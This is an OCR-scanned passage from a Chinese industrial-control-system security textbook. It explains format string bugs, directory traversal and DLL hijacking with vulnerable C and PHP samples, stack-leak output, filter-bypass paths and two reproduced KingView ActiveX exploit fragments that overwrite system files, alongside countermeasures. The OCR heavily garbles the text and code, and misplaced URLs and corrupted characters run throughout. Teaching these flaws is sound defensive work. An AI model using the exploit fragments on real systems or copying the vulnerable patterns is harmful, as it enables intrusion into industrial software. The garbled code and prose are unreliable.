味 着 “指向 int 类 型 的 指针 ”。bool* 则 意味 着 …… 估 计 你 已 经 知道 了 。 系 统 中 的 所 有 指针 都 需要 相同 数量 的 内 存 来 存储 。 对 于 32 位 系统 ， 指 针 需 要 32 位 比特 来 存 
储 。 对 于 64 位 系统 ， 指 针 需 要 64 位 比特 来 存储 。 


printf () 至 少 需要 一 个 参数 (格式 化 字符 串 ) ， 然 后 其 他 数量 的 参数 则 根据 格式 化 字符 串 中 的 内 容 而 定 。 人 至少 ， 这 是 该 消 数 正常 工作 的 方式 。 而 在 现实 中 ， 
由 于 消 数 printf () 可 以 获取 任意 数量 的 参数 ， 因 此 对 于 给 定 的 格式 化 字符 串 应 该 有 多 少 参数 等 详细 信息 人 在 编译 时 并 不 能 确定 。 事 实 上 ， 每 当 遇 到 格式 化 字符 串 中 
的 格式 化 参数 (由 % 字 符 指示 ) 时 ， 该 消 数 基本 上 都 通过 遍历 调用 堆栈 中 的 内 存 来 提取 与 之 对 应 的 值 。 然 而 ， 程 序 并 不 知道 栈 中 的 那些 值 实际 上 是 否 为 提供 给 格 
式 化 函数 的 ， 这 正 是 问题 的 症结 所 在 。 


与 我 们 之 前 见 到 的 漏洞 一 样 ， 格 式 化 字符 串 漏 洞 源 自 于 直接 使 用 了 用 户 提供 的 数据 ， 而 不 对 其 进行 验证 。 在 这 种 情况 下 ， 用 户 数据 束 成 为 了 格式 化 字符 串 的 
参数 。 为 了 偷懒 ， 格 式 化 字符 串 漏 洞 倾向 于 表现 为 如 下 形式 。 


char *s = /* user data..obtained somehow */ 
printf (s) ; 


是 的 。 从 技术 上 来 说 ， 格 式 化 字符 串 的 类 型 是 char*。 但 这 并 不 一 定 意味 着 任何 char* 都 可 以 用 。 这 种 用 法 非常 容易 遭受 攻击 ， 而 所 有 这 一 切 (此 刻 是 我 内 心 
中 作为 程序 员 的 一 面 在 说 话 ) 的 悲 表 在 于 这 个 问题 用 五 个 字符 就 可 以 修复 (可 以 将 代码 改 为 这 种 形式 ， 即 采用 printf ("%s", s) 编码 格式 ) 。 让 我 们 来 看 看 使 用 
这 个 示例 程序 的 危害 : 


#include <stdio.h> 
int main(int argc, char** argv) 


1f (argc < 2) return 1; 


printf (argv [1] ); 
printf ("\n") ; 


return Q; 


如 果 传 递 给 命令 行 一 个 字符 串 ， 然 后 运行 该 程序 ， 那 么 该 字符 串 会 被 赋值 给 参数 argv[1]， 打 印 输出 如 下 : 
sh-4.3S main "here's a string" 
| 目 
here's a string 


这 是 很 多 走 捷径 的 程序 员 希 望 看 到 的 。 下 面 尝试 输入 一 些 新 的 东西 : 


sh-4.3S main "$x $x Sx $x %x $x %xX $x" 
10690578 10690590 4005e0 5£248e80 5£248e80 10690578 400490 1069d570 


嗯 ， 这 次 有 点 不 同 了 。 尽 管 我 们 没有 把 任何 值 放 到 堆栈 里 , 但 printf () 还 是 尽职 尽责 地 根据 格式 化 字符 串 的 指示 把 值 从 堆栈 中 的 取 了 出 来 。 要 清 
楚 ，“%x%x%x%x%x%x%x%x” 是 main 程 序 的 第 一 个 (也 是 唯一 一 个 ) 命令 行 参数 。 字 符 串 存储 在 argv[1] 中 作为 格式 化 字符 串 直 接 传递 给 冰 数 printf () 
(argv[0] 为 “main”， 这 是 程序 自身 的 名 字 ) 。 出 现 的 那些 不 知 所 云 的 值 ， 是 从 调用 堆栈 提取 出 的 二 进 制 数据 的 十 六 进 制 表示 。 这 些 值 代 表 什么 呢 ? 我 并 不 确 
定 。 我 们 需要 多 看 一 看 是 人 否 还 能 找到 些 有 趣 的 东西 。 让 我 们 党 试 一 些 更 多 的 96X.…… 


sh-4.3S main "“AAAAAAAAAAAAAAAAAAAAAAZTXKEXEXSEXEXTKXTKXTKXOKXOKNOEKEKECKEKEKEKXEKXSEXTEXTXTXBKXEKEKEKXEXS 
Q © © Q Q © © 


口 Q Q 


XEXEXEXEKXEXEXEXEXEKXEXEX 
© 6 


XEXEXEXEXEXEXEKEKXEKEKEKEKEKEKEKEKEKEKEKEKEKEKEKEKEKEKERK 
EXEXEXEXEXEXEKEXEKEKEKEKREXEKEKXEKXEKFKEKEKEKEKEXEXEKEKEKRGEKEKEKREKEKREKEKXEKXRFEKEKEKEKEKEKXEXEKFERKS 
© 


XEXEXBXEXEXEXKECKEXEKEXEXTKXKEKXEKEKXEKREXECKEXEXEKXEXTEKEKEKEXTCKEXEKEXEXEKEKRTKEKXREKEXTCKEXEKXEKXKEKRTEKEK 


A 


AAAAAAAAAAAAAAAAAAAAAA65369148653691604005e0e50a1e80e50a1e806536914840049065369140 
4006704005e0e4d08fe06536914865369148040058604901fc9040049065369140006221fc905df1f- 
c900004005e0653691482004004906536914004004b9653691381c26536962a6536962f0653698076536983 
365369849653698626536987665369893653698b9653698d£653698Fd6536999865369a2d65369a6365369a- 
8d65369ac565369adb65369af565369b11653690d5065369d6265369d7d65369d9665369daeb65369db- 
665369dc965369df£165369e1965369e7c65369F3465369f4e65369fe80tx21653fe00010bfeb£fbff610001164 
3400040438597e50a6000809400490b3e8c3e8d3e8e36817019653693891F65369FF1F6536939900clac6500f 
9a16051363878fe00000000000000000000000000000000000000000000000000000000000000000000000000 
0000000616d000041414141414141414141414125782578257825782578257825782578257825782578257825 
1920 78297825782575257825 7625 78257825 76257825 7b 25/825 78257625 (825 782578257825 762578257825) 
S2o7S/G29 da (825/825 702570259 (oe fe2ofGz2o/oz2zo/o29 7/0250 7e2o7b2o 


读者 可 能 认为 这 样 的 输入 有 点 过 分 ， 但 仔细 看 看 我 们 得 到 的 结果 。 注 意 ， 我 们 看 到 字符 串 的 开始 是 一 串 大 写 的 A。 一 个 ASCll 编 码 的 A 的 十 六 进 制 表 示 是 
0x41。 在 输出 的 末尾 位 置 ， 我 们 看 到 几 个 41 彼 此 相 邻 。 看 来 我 们 已 经 找到 了 环境 变量 字符 串 的 位 置 。 尤 其 是 ， 我 们 已 经 找到 了 可 以 对 程序 进行 漏洞 利用 的 字符 串 
的 位 置 。 这 对 于 想 要 编写 漏洞 利用 代码 载荷 的 人 来 说 非常 有 用 。 为 什么 呢 ? 因为 ， 一 旦 攻击 者 知道 缓冲 区 在 哪 里 (无 论 是 某 一 个 内 人 存 地 址 的 绝对 地 址 还 是 相对 地 
tr) ， 攻 击 者 融 可 以 将 执行 法 导 向 那里 。 如 果 缓 冲 区 中 包含 恶意 指令 ， 那 么 在 某 种 程度 上 融 能 够 实现 对 机 器 的 有 效 漏 洞 利用 ， 从 而 导致 该 机 器 完全 处 于 攻击 者 的 
控制 之 下 。 


读者 还 可 能 会 认为 ，printf () 遂 数 仅仅 是 输出 数据 ， 又 不 是 修改 数据 ， 所 以 可 能 发 生 的 最 糟糕 的 事情 也 不 过 是 数据 港 露 。 如 果 这 样 想 .….. 那 么 你 就 错 了 。 
printf () 支持 %n 参 数 ， 而 该 参数 的 作用 是 写 入 字符 而 不 是 读 取 字符 。 尤 其 是 ， 它 向 参数 中 写 入 的 是 到 目前 为 止 打印 出 的 字 节 数 (直到 格式 化 字符 串 的 位 置 ) 。 
例如 ， 


printf ("ABCD%n", &x) ; 


上 述 代 码 的 作用 是 将 数字 4 瑟 入 变量 x。 借 助 %n 指 示 符 以 及 对 格式 化 字符 串 的 控制 ， 攻 击 者 可 以 通过 覆盖 指针 ， 将 执行 流 重 定向 到 含有 恶意 指令 的 组 ;中 区 。 注 
意 ， 昌 然 攻击 者 总 是 想 在 目标 机 器 上 执行 任意 指令 ,但 并 不 忌 是 这 样 ， 而 且 也 并 不 筷 是 可 能 的 。 而 仪 仅 更 改变 量 的 值 可 能 对 于 实施 攻击 而 言 就 已 经 足够 了 。 哪 怕 
只 改变 一 个 字 节 的 信息 就 足以 使 进程 表演 ,然后 就 可 以 有 效 地 发 起 拒绝 服务 攻击 (DoS) 。 在 商业 世界 中 ， 程 序 如 果 朋 江 束 会 立即 重启 ， 被 攻击 的 目标 可 能 只 是 
略微 觉得 有 些 米 熔 ， 然 后 停机 一 段 时 间 束 没事 了 。 但 在 工控 系统 之 中 ，DoS 攻 击 可 能 就 是 一 个 大 问题 。 它 可 能 导致 的 不 仅仅 只 是 经 济 损失 ， 而 是 可 能 造成 环境 破 
坏 甚至 人 身 伤亡 。DoS 攻 击 还 能 够 阻止 操作 人 员 查 看 甚至 控制 设备 。 因 此 ， 永 远 不 要 低估 比特 和 字 忆 的 价值 。 


好 吧 ， 通 过 %n 指 示 符 可 以 写 入 数据 ， 但 是 在 缓冲 区 中 攻击 者 肯定 没有 足够 的 空间 来 构造 有 效 的 地 址 ， 对 不 对 ” 别 这 么 快 下 结论 。 格 式 化 字符 串 指 示 符 还 能 够 
对 输出 值 进 行 填 充 ， 从 而 帮助 输出 对 齐 。 如 果 我 们 想 输 出 一 个 数字 ， 但 要 确保 从 左边 开始 显示 至 少 50 个 字符 ， 那 么 使 用 %50i 束 可 以 在 所 要 打印 数字 的 左边 放 上 50 
个 空格 〈 使 用 %50i 指 示 符 进行 0 的 填充 ) 。 所 使 用 的 格式 指示 符 的 数量 帮助 我 们 得 以 进入 堆 栈 ，%n 指 示 符 使 我 们 可 以 将 值 写 入 堆栈 ， 而 且 该 指示 符 还 可 以 用 来 填 


充 数据 ， 这 有 助 于 节省 代码 空间 。 


现在 肯定 还 会 出 现 一 些 问题 。 例 如 ， 当 采用 正在 运行 的 程序 的 有 效 内 存 地 址 来 覆盖 指针 时 ， 那 么 为 了 构造 一 个 高 32 比 特 值 写 入 内 存 ， 需 要 做 的 就 不 能 只 是 将 
填充 内 容 设 置 为 一 个 巨大 的 数值 。 为 了 解决 这 个 问题 ， 可 以 多 次 写 出 较 小 的 值 以 获得 相同 的 结果 。 了 解 格式 化 字符 串 漏洞 利用 的 详细 细节 (有 些 内 容 确 实 非 常 细 
MAD) 将 占用 本 书 大 量 笔墨 。 对 此 我 们 建议 阅读 《The Shellcoder’ s Handbook》 和 论文 《Exploiting Format String Vulnerabilities) 

(https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf) 。 


2. 同 工控 系统 的 关联 
由 于 格式 化 字符 串 主要 是 (虽然 不 限于 ) C/C++ 编程 语言 的 问题 ， 并 且 考 虑 到 在 工控 系统 的 开发 中 C 语 言 大 受 欢 迎 ， 因 此 在 工控 系统 软件 中 发 现 大 量 已 公布 
的 格式 化 字符 串 漏洞 并 不 奇怪 。 下 面 仪 列 出 了 其 中 一 部 分 漏洞 : 
- https: //ics-cert.us-cert. gov /advisories / ICS A-15-069-03 


- https: //ics-cert.us-cert. gov /advisories /ICSA-12-047-01A 


再 次 选择 KingView6.53 作 为 示例 ，Metasploit 的 开发 公司 Rapid7 提 供 了 一 个 模块 ， 该 模块 能 够 对 以 不 安全 方式 调用 的 sprint () 函数 进行 漏洞 利用 。 下 面 是 
关于 该 模块 详细 信息 的 链接 : http://www.rapid7.com/db/modules/exploit/windows/fileformat/kingview_king-mess kvl。 在 页 面 底部 列 出 了 如 何 使 用 该 模 
块 的 说 明 。 该 漏洞 必须 本 地 触 友 。 昌 然 这 个 漏洞 并 不 像 本 章 中 列 出 的 其 他 漏洞 一 样 那么 糟糕 ， 但 漏洞 毕竟 就 是 漏洞 。 如 果 对 Metasploit 不 熟悉 ， 那 么 可 以 好 好 研 
究 下 这 套 工 具 。Metasploit 绝 对 是 渗透 测试 人 员 (和 攻击 者 ) 的 好 朋友 。 


3. 格 式 化 字符 串 的 对 抗 措 施 


在 本 章 列 出 的 所 有 漏洞 中 ， 格 式 化 字符 串 漏 洞 是 迄今 为 止 最 容易 友 现 和 修复 的 漏洞 。 如 果 在 格式 化 字符 串 的 生成 中 使 用 的 都 是 用 户 数 据 ， 那 么 此 时 就 要 注意 
了 。 任 何 时 候 格式 化 字符 串 的 参数 都 不 仅仅 只 是 字符 串 单 量 ， 均 应 该 对 其 进行 检查 。 大 多 数 时 候 可 以 用 printf (“%s”，str) 或 者 与 之 类 似 的 其 他 内 容 来 替代 
printf (str) ， 这 时 融 可 以 解决 格式 化 字符 串 漏 洞 问 题 了 ， 此 外 ， 还 可 以 通过 对 用 户 数据 中 格式 化 字符 串 中 的 字符 进行 检查 的 方式 来 杜绝 格式 化 字符 串 漏 洞 。 而 
与 其 尝试 过 滤 格 式 化 字符 串 ， 则 不 如 完全 拒绝 输入 格式 化 字符 串 (除非 确实 需要 % 字 符 ) 。 融 我 个 人 而 言 ， 一 般 情况 下 ， 只 要 代码 中 接收 的 数据 不 是 百分之百 地 
安全 ， 我 都 会 完全 地 拒绝 接收 数据 。 


6.1.6 HERED 
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SE Mal TY) : 
Kl TER : 


1. AFERE 


有 了 时 不 对 输入 进行 验证 并 不 一 定 会 导致 较为 底层 的 内 存 操纵 漏洞 ， 可 能 只 会 导致 某 些 看 起 来 非常 简单 的 漏洞 ， 例 如 字符 串 中 包含 了 程序 员 示 考虑 到 的 异常 字 
符 。 目 录 遍 历 漏 洞 就 是 这 些 漏洞 中 的 一 种 。 


有 很 多 实例 程序 出 于 这 样 或 那样 的 原因 需要 访问 文件 系统 ， 有 些 程序 可 能 需要 存储 某 些 信息 ， 有 些 程序 可 能 需要 检索 某 些 信 息 。 无 论 哪 种 原因 ， 程 序 员 都 需 
要 使 用 字符 串 来 指示 文件 的 路 径 。 在 此 要 记 住 的 是 ， 当 用 户 输入 的 数据 对 路 径 字 符 串 可 能 的 编码 形式 造成 影响 时 ， 是 因为 访问 大 多 数 文件 系统 时 遇 到 了 特殊 的 字 


ròp 


符 和 字符 串 。 


本 章 一 直 在 基于 C 语 言 开 展 漏洞 分 析 ， 下 面 让 我 们 看 一 看 另 一 种 语言 。 工 控 系 统 行业 中 有 大 量 的 人 机 界面 和 其 他 设备 开始 逐渐 采用 基于 Web 的 访问 方式 ， 尽 
管 其 中 .NET 和 Java 在 人 机 界面 的 实现 中 很 常见 ， 但 是 PHP 仍 然 是 最 受 欢 迎 的 服务 器 端 Web 编 程 语言 之 一 
(http://w3techs.com/technologies/overview/programming_language/all) 。 下 面 让 我 们 来 看 一 段 PHP 代 码 : 


Sdir = "uploads/"; 

Sfilename = $ GET['filename'] ; 

Spath = $dir . $filename; 

if (!move uploaded file($ FILES['new file'] ['tmp name'], Spath)) { 
echo "Error creating file"; 
exit; 


} 


对 于 无 论 出 于 何 种 用 途 (配置 文件 、 日 志 附 件 等 ) 的 文件 上 传 页 面 ， 上 面 这 段 代 码 都 可 以 嵌入 到 页 面 当中 。 程 序 员 看 起 来 似乎 是 通过 为 所 有 上 传 文件 指示 一 
个 人 存放 目录 的 方式 来 党 试 包含 文 件 。 问 题 在 于 $_ CET[filename ] 的 值 是 用 户 提供 的 ， 但 是 没有 用 户 可 以 被 赋予 完全 的 信任 来 执行 上 述 操作 。 假 设 上 传 文件 名 变量 
是 这 样 的 : http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ebook/uncompressed/16575/OEBPS/Text/../index.php, AA 
接 下 来 会 发 生 什么 呢 ? 好 的 ，$path 变 量 随后 就 会 变 成 uploads/http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/16575/OEBPS/Text/../index.php， 这 意味 着 如 果 在 与 uploads 目 录 相 同 的 目录 下 存在 文件 index.php， 
那么 无 论 用 户 写 入 的 内 容 是 什么 ， 该 文件 都 将 被 用 户 所 提供 的 内 容 覆 兰 。 这 本 身 听 起 来 可 能 不 是 那么 糟糕 。 用 户 可 以 通过 运行 重新 安 疼 ， 或 者 从 可 信和 度 较 高 的 知 
名 源码 库 中 复制 相应 文件 来 恢复 原始 文件 。 但 是 ， 如 果 改 动 不 是 那么 明显 呢 ? 如 果 攻 击 者 自己 也 购买 了 一 套 应 用 程序 或 设备 ， 对 应 用 程序 、 设 备 固 件 进行 了 深入 
的 研究 ， 实 现 了 对 关键 文件 的 自 改 ， 并 最 终 对 用 户 的 应 用 程序 或 设备 固件 进行 了 蔡 损 ， 从 而 使 程序 或 设备 在 执行 其 所 有 正常 功能 的 同时 ， 还 在 后 台 执 行 其 他 任务 
怎么 办 ?那么 ， 该 文件 就 可 能 一 直 运 行 ， 而 没有 人 注意 到 数据 已 经 泄露 、 或 者 已 经 被 植 入 了 黑客 稍 后 会 用 到 的 后 门 。 任 何 能 够 导致 攻击 者 代码 在 目标 系统 上 运行 
的 漏洞 都 是 危险 的 漏洞 。 


显然 在 文件 名 中 包含 http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16575/OEBPSVText/../ 是 个 
馒 主意 。 有 些 程序 员 认 识 到 了 这 一 点 ， 并 且 尝 试 将 其 过 渡 掉 : 


Sdir = "uploads/"; 

$ GET['filename'] ; 

$filename = str replace("../", "", $filename); 

Spath = $dir . $filename; 

if (!move uploaded file($ FILES['new file'] ['tmp name'], $path)) { 
echo "Error creating file"; 


Sfilename 


exit; 


通过 调用 str_replace () 函数 能 够 将 最 后 一 个 例子 中 危险 的 文件 名 转换 成 完全 正常 的 形式 。 那 么 此 时 ， 一 切 都 没 问题 了 .…… 是 真 的 吗 ” 如 果 文 件 名 看 起 来 像 下 
面 这 样 怎么 办 : .………/./index.php? 此 时 ， 沙 数 str_replace () 会 将 字符 串 转换 为 我 们 当初 想 要 避免 的 糟糕 字符 串 ! 程序 员 可 能 需要 尝试 连续 调用 两 个 
str_replace () 函数 来 避免 得 到 这 样 的 结果 ， 但 是 攻击 者 又 可 以 使 用 ……/,/Vindex.php 输 入 来 实现 同样 的 效果 。 设 计 行 之 有 效 的 过 滤器 对 数据 进行 清洗 、 保 证 其 
安全 性 是 非常 困难 的 ， 这 也 是 为 什么 我 作为 一 个 程序 员 根 本 不 在 这 方面 费 神 的 原因 。 如 果 我 在 收 到 的 数据 ， 即 便 是 远程 的 数据 中 发 现 了 一 些 可 疑 的 东西 ， 我 也 会 
把 这 些 数 据 全 部 扔 挤 ， 并 在 日 志 中 将 其 记录 为 潜在 威胁 。 但 令 人 担忧 的 是 ， 许 多 程序 员 并 不 会 采取 这 样 的 做 法 。 他 们 试图 解决 这 样 一 个 糟糕 的 局 面 ， 而 我 则 宁愿 
选择 安全 地 竺 在 原 地 ， 尤 其 是 在 面 对 工 控 系统 和 SCADA 系 统 时 更 是 如 此 。 


2. 同 工控 系统 的 关联 

以 下 是 工控 系统 应 用 程序 的 一 些 示 例 ， 在 这 些 应 用 程序 中 对 输入 的 假设 有 点 多 ， 容 易 遭 受 目录 饥 历 攻击 : 
- https: //ics-cert.us-cert. gov /advisories / ICS A-15-076-02 
* https: //ics-cert.us-cert. gov /advisories /ICSA-15-064-02A 


- https: //ics-cert.us-cert. gov /advisories / ICS A-13-011-02 


KingView6.53 中 还 存在 一 个 目录 遍历 漏洞 ， 该 漏洞 允许 攻击 者 远程 覆盖 文件 ， 从 而 实现 对 服务 器 的 完全 控制 。 此 外 ， 网 站 exploit-db.com 也 公布 了 一 段 可 用 
的 漏洞 利用 代码 ， 该 段 代码 展示 了 如 何 实 现 对 服务 器 的 攻击 (https://www.exploit-db.com/exploits/28085/) 。 下 面 是 完整 的 漏洞 利用 代码 。 在 这 个 例子 中 虽 
然 展示 的 是 覆盖 服务 器 中 的 win.ini 文 件 ， 但 是 也 可 以 方便 地 将 其 变更 为 某 个 关键 的 可 执行 文件 或 .dll 文 件 。 


<html> 

<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' 
></object> 

<script language='vbscript'> 


EDWARD SR 
target.SaveToFile argl 


</script> 


这 正 是 一 个 未 对 外 部 输入 数据 进行 正确 验证 的 实例 。 如 果 将 被 保存 的 文件 限制 到 特定 目录 ， 那 么 就 会 强制 执行 。 


顺便 说 一 句 ， 这 并 不 是 KingView6.53 中 唯一 的 目录 人 遍历 漏洞 。 网 站 exploit-db.com 中 还 公布 了 另 一 段 漏洞 利用 代码 (https://www.exploit- 
db.com/exploits/28084/) ， 该 段 代码 同 之 前 的 示例 类 似 ， 实 现 了 对 另 一 个 ActiveX 控 件 的 攻击 。 


<html> 

<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A475E' 

id='target'>s</object> 

<input type=button onclick="copyfile()" value="Do It!"> 

“scrips 

Function copyfile() 

{ 
var filel w\\\\192.168.1.165\\share\\poc.txt"; //source 
var file2 = "c:\\WINDOWS\\poc.txt"; //destination 
result = target.ReplaceDBFile(filel,file2) ; 


</script> 


3. AREKIN HENE 


目录 人 遍历 漏洞 解决 起 来 相当 容易 。 在 任 一 文件 或 路 径 字 符 串 中 检查 目录 遍历 字符 ( “http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/16575/OEBPSVText/.”、“/”、 “\" 等 ) 。 如 果 发 现存 在 目录 遍历 字符 ， 则 拒绝 输入 。 对 于 这 种 漏洞 
需要 注意 的 是 ， 攻 击 者 有 时 会 插入 Unicode 编 码 的 字符 来 对 验证 和 过 滤 代 码 进行 混淆 (其 实 不 需 过 滤 ， 直 接 拒绝 ! ) 请 确保 代码 能 够 像 文 件 系 统 处 理 字 符 串 的 方 
式 一 样 对 字符 串 中 的 字符 进行 解释 。 如 果 能 够 熟练 掌握 编程 语言 和 操作 系统 的 相关 知识 ， 那 么 就 应 该 能 做 到 这 一 点 。 


6.1.7 ”DLL 劫持 


Re A TF: 
PUR FER : 


1.DLL 动 持原 理 


作为 优秀 软件 设计 工作 中 的 一 部 分 会 对 党 用 组 件 进行 分 解 ， 从 而 实现 组 件 的 多 处 复 用 。 这 一 原则 无 论 是 对 于 代码 片段 ， 还 是 操作 系统 级 别 的 软件 ， 抑 
或 是 介 于 两 者 之 间 的 其 他 软件 都 是 适用 的 。 减 小 程序 规模 、 提 高 代码 模块 化 的 常用 方法 之 一 是 使 用 动态 链接 库 文件 (Dynamically Linked Library, DLL) 。 
文件 在 很 大 程度 上 就 像 一 个 完整 的 程序 ， 其 中 包含 一 系列 可 以 调用 的 国 数 。 但 是 ，DLL 文 件 不 能 独立 运行 。 必 须 借 助 其 他 程序 才能 得 以 加 载 。 借 助 DLL 文件 能 够 对 
应 用 程序 的 部 分 功能 进行 分 离 ， 从 而 在 不 对 程序 进行 改动 的 情况 下 ， 实 现 对 整个 程序 的 更 新 。DLL 具 有 许多 优点 使 得 DLL 文 件 用 起 来 非常 方便 ， 但 是 如 果 未 对 DLL 
进行 正确 处 理 ，DLL 的 使 用 可 能 会 给 应 用 程序 市 来 非常 严重 的 安全 漏洞 。 


为 了 了 解 攻 击 者 是 如 何 通 过 DLL 劫持 获取 程序 入 口 点 的 ， 我 们 需要 熟悉 DLL 的 加 载 过 程 以 及 程序 如 何 使 用 DLL 文件 。Windows 操 作 系 统 中 有 一 个 标准 库 函 数 
LoadLibrary () ， 该 函数 以 所 要 加 载 的 DLL 文件 路 径 与 文件 名 的 字符 串 为 参数 。 一 旦 加 载 DLL 库 文件 之 后 ， 就 可 以 调用 DLL 中 的 孙 数 ， 方 法 是 通过 
GetProcAddress () 函数 获得 所 要 调用 的 函数 地 址 ， 其 中 GetProcAddress () 消 数 以 所 要 调用 的 尔 数 名 为 参数 。 这 一 过 程 非常 简单 明了 。LoadLibrary () Bex 
人 允许 指定 的 路 径 是 相对 路 径 ， 这 样 程序 的 位 置 即便 在 文件 系统 中 出 现 变动 也 仍然 能 够 正常 工作 。 如 果 路 径 是 绝对 的 ， 那 么 除非 加 载 到 指定 文件 ， 否 则 
LoadLibrary () 就 会 报错 。 而 如 果 路 径 是 相对 的 ， 那 么 就 会 在 多 个 路 径 下 进行 查找 ， 如 果 碍 找 不 到 则 LoadLibrary () 会 放弃 查找 。 这 些 路 径 取 决 于 安全 DLL 搜 索 
模式 (Safe DLL Search Mode) 是 否 开 司 。 在 Windows XP 中 ， 该 模式 在 默认 情况 下 是 禁用 的 ， 但 在 新 版 本 的 Windows 操 作 系 统 中 是 默认 开启 的 。 尝 试 搜索 的 
路 径 包 括 程序 加 载 目 录 、 当 前 目录 、 系 统 目录 、16 位 系统 目录 、Windows 目 录 及 PATH 环境 变量 中 列 出 的 目录 。 如 果 对 安全 DLL 搜索 模式 如 何 影 响 上 述 路 径 的 搜 
索 顺 序 感 兴趣 ， 可 以 查看 文档 https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586 (v=vs.85) .aspx (文档 可 是 黑客 最 好 的 朋友 ， 其 次 就 
是 一 缸 Jolt 可 乐 ) 。 


接 下 来 ， 以 调用 LoadLibrary (“mainLib.dll”) 函数 的 应 用 程序 为 例 。 该 函数 会 在 刚才 提 到 的 路 径 中 进行 逐个 搜索 ， 直 到 找到 名 为 mainLib.dll 的 文件 。 读 者 
可 能 会 想到 接 下 来 会 发 生 什 么 了 。 如 果 攻 击 者 能 够 在 搜索 链 中 目标 文件 所 在 目录 之 前 的 目录 中 创建 文件 ， 那 么 会 怎么 样 呢 ?如 果 攻 击 者 在 该 目录 中 创建 了 一 个 具 
有 相同 名 称 的 DLL 文 件 ， 那 么 程序 束 会 加 载 攻击 者 创建 的 文件 ， 程 序 也 将 开始 调用 攻击 者 创建 文件 中 的 消 数 。 攻 击 者 所 要 做 的 就 是 确保 新 创建 文件 中 的 消 数 名 和 人 参 
数列 表 同 目标 文件 中 的 函数 名 和 参数 列表 相 匹 配 ， 而 借助 IDA Pro 之 类 的 调试 器 也 不 难 实 现 。 应 用 程序 在 自身 实现 过 程 中 或 许 采 用 了 优秀 的 安全 程序 设计 实践 ， 但 

如 果 DLL 文 件 中 存在 问题 ， 那 么 攻击 者 仍然 有 办 法 进入 程序 。 


从 攻击 者 的 角度 来 看 ，DLL 动 持 是 一 种 获得 程序 访问 权限 的 好 方法 。 并 且 同 缓冲 区 溢出 、 格 式 化 字符 串 等 方法 相 比 ，DLL 动 持 更 加 可 靠 、 稳 定 。 在 这 种 情况 
下 ， 程 序 可 以 有 意 加 载 攻击 者 的 代码 并 直接 对 其 进行 调用 ， 而 无 需 为 stack canaries 保 护 机 制 伤 脑筋 ( 详 见 第 7 章 ) ， 也 没有 必要 应 用 ROP 链 技术 ( 即 面向 返回 的 
编程 ，Return Oriented Programming， 是 一 种 用 于 规避 数据 执行 保护 [DEP] 的 高 级 漏洞 利用 技术 ) 。 程 序 只 需要 礼貌 地 将 执行 流程 转交 给 恶意 代码 就 可 以 了 。 


除了 根据 搜索 顺序 提前 创建 DLL 文件 乙 外 ， 如 果 攻 击 者 能 够 覆盖 DLL 文件 ， 那 么 显然 也 可 以 执行 恶意 代码 。 好 在 操作 系统 提高 了 这 种 攻击 方式 的 攻击 难度 ， 但 
还 是 存在 部 分 保护 不 够 严密 的 系统 。 对 于 此 类 系统 ， 这 种 攻击 方式 还 是 值得 一 试 的 。 覆 苹 DLL 文 件 的 难点 在 于 ， 除 非 手 动 包含 原始 代码 ， 否 则 可 能 会 对 原始 代码 造 
成 琢 坏 。 但 是 如 果 先 加 载 真 正 的 DLL 文件 ， 再 将 函数 调用 传递 给 恶意 代码 ， 那 么 保证 原文 件 中 代码 的 正确 执行 融 容 易 得 多 了 。 这 实际 上 是 一 种 中 间 人 攻击 。 应 用 程 
序 的 功能 都 会 实现 ， 程 序 的 预期 效果 也 都 会 达到 。 然 而 ， 攻 击 者 的 代码 也 会 在 中 上 间 默 默 地 执行 ， 可 以 记录 信息 、 修 改 参数 ， 还 可 以 完全 去 做 自己 想 要 做 的 事情 。 


最 后 需要 指出 的 是 ，DLIL 劫 持 或 注入 并 不 仅 仪 只 是 针对 Windows 操 作 系统 。Linux 操 作 系 统 的 各 个 友 行 版 也 具有 与 Windows 操 作 系 统 DLL 文件 类 似 的 特点 。 只 
不 过 Linux 操 作 系 统 使 用 的 是 共享 对 象 文件 (*.so 文 件 ) ， 而 在 搜索 相对 路 径 指定 的 .so 文件 时 也 会 出 现 类 似 的 问题 。 在 Linux 中 ， 攻 击 者 通过 操作 环境 变量 
LD_LIBRARY_PATH， 能 够 在 LD_LIBRARY_PATH 路 径 中 预 置 攻击 者 控制 的 目录 ， 从 而 在 加 载 合法 的 共享 对 象 文件 之 前 加 载 恶 意 文 件 。 


2. 同 工控 系统 的 关联 


DLL 劫持 虽然 不 是 一 种 新 的 攻击 方式 (不 像 缓 冲 区 溢出 一 样 历史 悠久 ， 但 也 出 现 很 长 时 间 了 ) ; 但 即便 如 此 ， 在 工控 系统 软件 中 仍然 会 出 现 DLL 支 持 。 事 实 
上 ，2015 年 12 月 10 日 在 Open Automation Software 公 司 的 OPC Systems.NET 程 序 中 就 发 现 了 DLL 动 持 漏洞 (参见 第 一 个 ICS-CERT 公 告 ) 。 


* https://ics-cert.us-cert. gov /advisories/ICSA-15-344-02 
* https: //ics-cert.us-cert. gov /advisories /ICSA-15-069-01 
- https://ics-cert.us-cert. gov /advisories/ICSA-12-025-02A 
* https: //ics-cert.us-cert. gov /advisories /ICSA-12-145-01 


我 们 再 来 看 看 KingView6.53， 这 是 一 个 现实 中 的 实例 ， 展 示 了 对 DLL 劫持 漏洞 进行 利用 是 多 么 容易 。 首 先 ， 如 果 程 序 中 存在 DLL 文件 的 话 ， 我 们 必须 找 出 哪 
些 DLL 在 加 载 询 表 中 容易 被 攻击 者 劫持 。 使 用 Process Monitor 工 具 (ProcMonfhttps://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx]) 
是 获取 这 些 信息 的 一 种 简单 方法 。 通 过 添加 过 滤器 可 以 消除 来 自 其 他 应 用 程序 的 非 相 关 的 表 项 。 局 动 KingView 的 TouchVew 程 序 后 ，Process Monitor 会 显示 以 
下 内 容 : 


æ Process Monitor - Sysinternals: www.sysinternals.com 


File Edit Event Filter Tools Options Help 


oH ABR!) SAS) | | MS |) RRA 

Time... Process Name PID Operation Path Result 

8:13:4... wPTouchVEW exe 1232 A QueryOpen C:\Program Files\KingviewT ouchVEW exe.Local NAME NOT FOUND 

